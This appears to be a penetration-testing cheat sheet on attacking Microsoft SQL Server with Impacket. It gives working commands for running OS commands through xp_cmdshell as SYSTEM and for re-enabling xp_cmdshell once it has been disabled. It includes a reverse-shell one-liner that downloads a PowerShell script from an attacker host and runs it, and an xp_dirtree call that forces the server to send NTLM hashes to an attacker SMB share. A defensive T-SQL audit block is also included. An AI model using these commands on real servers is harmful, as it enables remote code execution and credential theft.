MSSQL Client

Connect with Impacket's mssqlclient.py:

mssqlclient.py <user>@<target>

xp_cmdshell gives OS command execution as the SQL Server service account (here LocalSystem):

SQL> xp_cmdshell whoami
output
nt authority\system

Get a reverse shell via a Nishang PowerShell script:

EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://192.168.119.122/Utilities/Revshells/shell.ps1") | powershell -noprofile'

Sometimes xp_cmdshell is disabled:

[-] ERROR(CHIMERA\SQLEXPRESS): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

It can be re-enabled with sp_configure:

SQL> sp_configure 'show advanced options', '1'
[*] INFO(CHIMERA\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE
SQL> sp_configure 'xp_cmdshell', '1'
[*] INFO(CHIMERA\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE
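The defender-side counterpart to the sequence above, added here as an example and not part of the original notes: T-SQL that checks whether xp_cmdshell has been switched on, reverts the change, lists the logins that could switch it on again, and shows which account the service runs as (which is what xp_cmdshell output runs as for a sysadmin caller). Changing these options through sp_configure requires the ALTER SETTINGS server permission, held by members of sysadmin and serveradmin, so that membership list is the thing to review.

```sql
-- Added example (not from the original notes): audit and revert xp_cmdshell.

-- 1. Current state. "value" is the configured setting, "value_in_use" is what is
--    active right now; a 1 in either column means the option has been turned on.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Revert: turn xp_cmdshell off, then hide the advanced options again.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 3. Any member of sysadmin or serveradmin holds ALTER SETTINGS and can re-enable it.
SELECT sp.name, sp.type_desc, sp.is_disabled
FROM sys.server_principals AS sp
WHERE sp.type IN ('S', 'U', 'G')   -- SQL login, Windows login, Windows group
  AND (IS_SRVROLEMEMBER('sysadmin', sp.name) = 1
       OR IS_SRVROLEMEMBER('serveradmin', sp.name) = 1);

-- 4. The account xp_cmdshell commands run under for a sysadmin caller is the
--    service account itself; "NT AUTHORITY\SYSTEM" here explains the whoami output.
--    (Requires VIEW SERVER STATE.)
SELECT servicename, service_account, startup_type_desc
FROM sys.dm_server_services;
```

Run it as a sysadmin from a maintenance connection. If step 4 shows LocalSystem, moving the service to a low-privilege virtual or managed service account limits what a re-enabled xp_cmdshell can do on the host.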

Capture NTLM hashes: set up Responder, then make the server connect to your SMB share via xp_dirtree:

xp_dirtree '\\10.10.14.14\a';